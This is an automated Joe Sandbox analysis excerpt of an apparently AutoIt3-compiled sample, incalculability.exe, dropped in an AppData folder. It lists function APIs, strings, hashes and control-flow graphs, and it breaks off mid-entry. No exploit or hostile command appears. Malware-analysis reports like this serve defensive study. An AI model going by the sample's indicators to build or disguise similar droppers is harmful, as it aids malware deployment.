                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                            • String ID: 0SH
                            • API String ID: 3363477735-851180471
                            • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                            • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                            • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                            • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                            Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                            • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: AddressLibraryLoadProc
                            • String ID: IsThemeActive$uxtheme.dll
                            • API String ID: 2574300362-3542929980
                            • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                            • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                            • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                            • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                            Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                            Download Yara Rule
                            APIs
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                            • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                            • TranslateMessage.USER32(?), ref: 00409556
                            • DispatchMessageW.USER32(?), ref: 00409561
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Message$Peek$DispatchSleepTranslate
                            • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                            • API String ID: 1762048999-758534266
                            • Opcode ID: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                            • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                            • Opcode Fuzzy Hash: f501adada9997479f36eff97a8dbeac7b9e74cdaa6692d9ba2f3cae751283df7
                            • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                            Function 00401F20 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 214COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\inhumate\incalculability.exe,00000104,?), ref: 00401F4C
                              • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                              • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                            • __wcsicoll.LIBCMT ref: 00402007
                            • __wcsicoll.LIBCMT ref: 0040201D
                            • __wcsicoll.LIBCMT ref: 00402033
                              • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                            • __wcsicoll.LIBCMT ref: 00402049
                            • _wcscpy.LIBCMT ref: 0040207C
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\inhumate\incalculability.exe,00000104), ref: 00428B5B
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                            • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$C:\Users\user\AppData\Local\inhumate\incalculability.exe$CMDLINE$CMDLINERAW
                            • API String ID: 3948761352-2181804678
                            • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                            • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                            • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                            • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                            Function 00452719 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 147COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __fread_nolock$_fseek_wcscpy
                            • String ID: D)E$D)E$FILE
                            • API String ID: 3888824918-361185794
                            • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                            • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                            • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                            • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                            Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                            • __wsplitpath.LIBCMT ref: 0040E41C
                              • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                            • _wcsncat.LIBCMT ref: 0040E433
                            • __wmakepath.LIBCMT ref: 0040E44F
                              • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                              • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                              • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                            • _wcscpy.LIBCMT ref: 0040E487
                              • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                            • _wcscat.LIBCMT ref: 00427541
                            • _wcslen.LIBCMT ref: 00427551
                            • _wcslen.LIBCMT ref: 00427562
                            • _wcscat.LIBCMT ref: 0042757C
                            • _wcsncpy.LIBCMT ref: 004275BC
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                            • String ID: Include$\
                            • API String ID: 3173733714-3429789819
                            • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                            • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                            • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                            • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                            Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • _fseek.LIBCMT ref: 0045292B
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                              • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                              • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                            • __fread_nolock.LIBCMT ref: 00452961
                            • __fread_nolock.LIBCMT ref: 00452971
                            • __fread_nolock.LIBCMT ref: 0045298A
                            • __fread_nolock.LIBCMT ref: 004529A5
                            • _fseek.LIBCMT ref: 004529BF
                            • _malloc.LIBCMT ref: 004529CA
                            • _malloc.LIBCMT ref: 004529D6
                            • __fread_nolock.LIBCMT ref: 004529E7
                            • _free.LIBCMT ref: 00452A17
                            • _free.LIBCMT ref: 00452A20
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                            • String ID:
                            • API String ID: 1255752989-0
                            • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                            • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                            • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                            • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                            Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                            • RegisterClassExW.USER32(00000030), ref: 004104ED
                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                            • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                            • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                            • ImageList_ReplaceIcon.COMCTL32(009099B8,000000FF,00000000), ref: 00410552
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                            • API String ID: 2914291525-1005189915
                            • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                            • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                            • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                            • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                            Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                            • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                            • LoadIconW.USER32(?,00000063), ref: 004103C0
                            • LoadIconW.USER32(?,000000A4), ref: 004103D3
                            • LoadIconW.USER32(?,000000A2), ref: 004103E6
                            • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                            • RegisterClassExW.USER32(?), ref: 0041045D
                              • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                              • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                              • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                              • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                              • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                              • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                              • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(009099B8,000000FF,00000000), ref: 00410552
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                            • String ID: #$0$AutoIt v3
                            • API String ID: 423443420-4155596026
                            • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                            • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                            • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                            • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                            Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _malloc
                            • String ID: Default
                            • API String ID: 1579825452-753088835
                            • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                            • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                            • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                            • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                            Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1954 40f5c0-40f5cf call 422240 1957 40f5d0-40f5e8 1954->1957 1957->1957 1958 40f5ea-40f613 call 413650 call 410e60 1957->1958 1963 40f614-40f633 call 414d04 1958->1963 1966 40f691 1963->1966 1967 40f635-40f63c 1963->1967 1968 40f696-40f69c 1966->1968 1969 40f660-40f674 call 4150d1 1967->1969 1970 40f63e 1967->1970 1973 40f679-40f67c 1969->1973 1972 40f640 1970->1972 1974 40f642-40f650 1972->1974 1973->1963 1975 40f652-40f655 1974->1975 1976 40f67e-40f68c 1974->1976 1977 40f65b-40f65e 1975->1977 1978 425d1e-425d3e call 4150d1 call 414d04 1975->1978 1979 40f68e-40f68f 1976->1979 1980 40f69f-40f6ad 1976->1980 1977->1969 1977->1972 1990 425d43-425d5f call 414d30 1978->1990 1979->1975 1982 40f6b4-40f6c2 1980->1982 1983 40f6af-40f6b2 1980->1983 1985 425d16 1982->1985 1986 40f6c8-40f6d6 1982->1986 1983->1975 1985->1978 1988 425d05-425d0b 1986->1988 1989 40f6dc-40f6df 1986->1989 1988->1974 1991 425d11 1988->1991 1989->1975 1990->1968 1991->1985
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: __fread_nolock_fseek_memmove_strcat
                            • String ID: AU3!$EA06
                            • API String ID: 1268643489-2658333250
                            • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                            • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                            • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                            • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                            Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1994 401100-401111 1995 401113-401119 1994->1995 1996 401179-401180 1994->1996 1998 401144-40114a 1995->1998 1999 40111b-40111e 1995->1999 1996->1995 1997 401182 1996->1997 2000 40112c-401141 DefWindowProcW 1997->2000 2002 401184-40118e call 401250 1998->2002 2003 40114c-40114f 1998->2003 1999->1998 2001 401120-401126 1999->2001 2001->2000 2005 42b038-42b03f 2001->2005 2009 401193-40119a 2002->2009 2006 401151-401157 2003->2006 2007 40119d 2003->2007 2005->2000 2008 42b045-42b059 call 401000 call 40e0c0 2005->2008 2012 401219-40121f 2006->2012 2013 40115d 2006->2013 2010 4011a3-4011a9 2007->2010 2011 42afb4-42afc5 call 40f190 2007->2011 2008->2000 2010->2001 2017 4011af 2010->2017 2011->2009 2012->2001 2014 401225-42b06d call 468b0e 2012->2014 2018 401163-401166 2013->2018 2019 42b01d-42b024 2013->2019 2014->2009 2017->2001 2025 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 2017->2025 2026 4011db-401202 SetTimer RegisterWindowMessageW 2017->2026 2020 42afe9-42b018 call 40f190 call 401a50 2018->2020 2021 40116c-401172 2018->2021 2019->2000 2027 42b02a-42b033 call 4370f4 2019->2027 2020->2000 2021->2001 2028 401174-42afde call 45fd57 2021->2028 2026->2009 2033 401204-401216 CreatePopupMenu 2026->2033 2027->2000 2028->2000 2045 42afe4 2028->2045 2045->2009
                            APIs
                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                            • KillTimer.USER32(?,00000001,?), ref: 004011B9
                            • PostQuitMessage.USER32(00000000), ref: 004011CB
                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                            • CreatePopupMenu.USER32 ref: 00401204
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                            • String ID: TaskbarCreated
                            • API String ID: 129472671-2362178303
                            • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                            • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                            • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                            • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E
                            Function 004115D7 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                            APIs
                            • _malloc.LIBCMT ref: 004115F1
                              • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                              • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                              • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                            • std::exception::exception.LIBCMT ref: 00411626
                            • std::exception::exception.LIBCMT ref: 00411640
                            • __CxxThrowException@8.LIBCMT ref: 00411651
                            Strings
                            Memory Dump Source
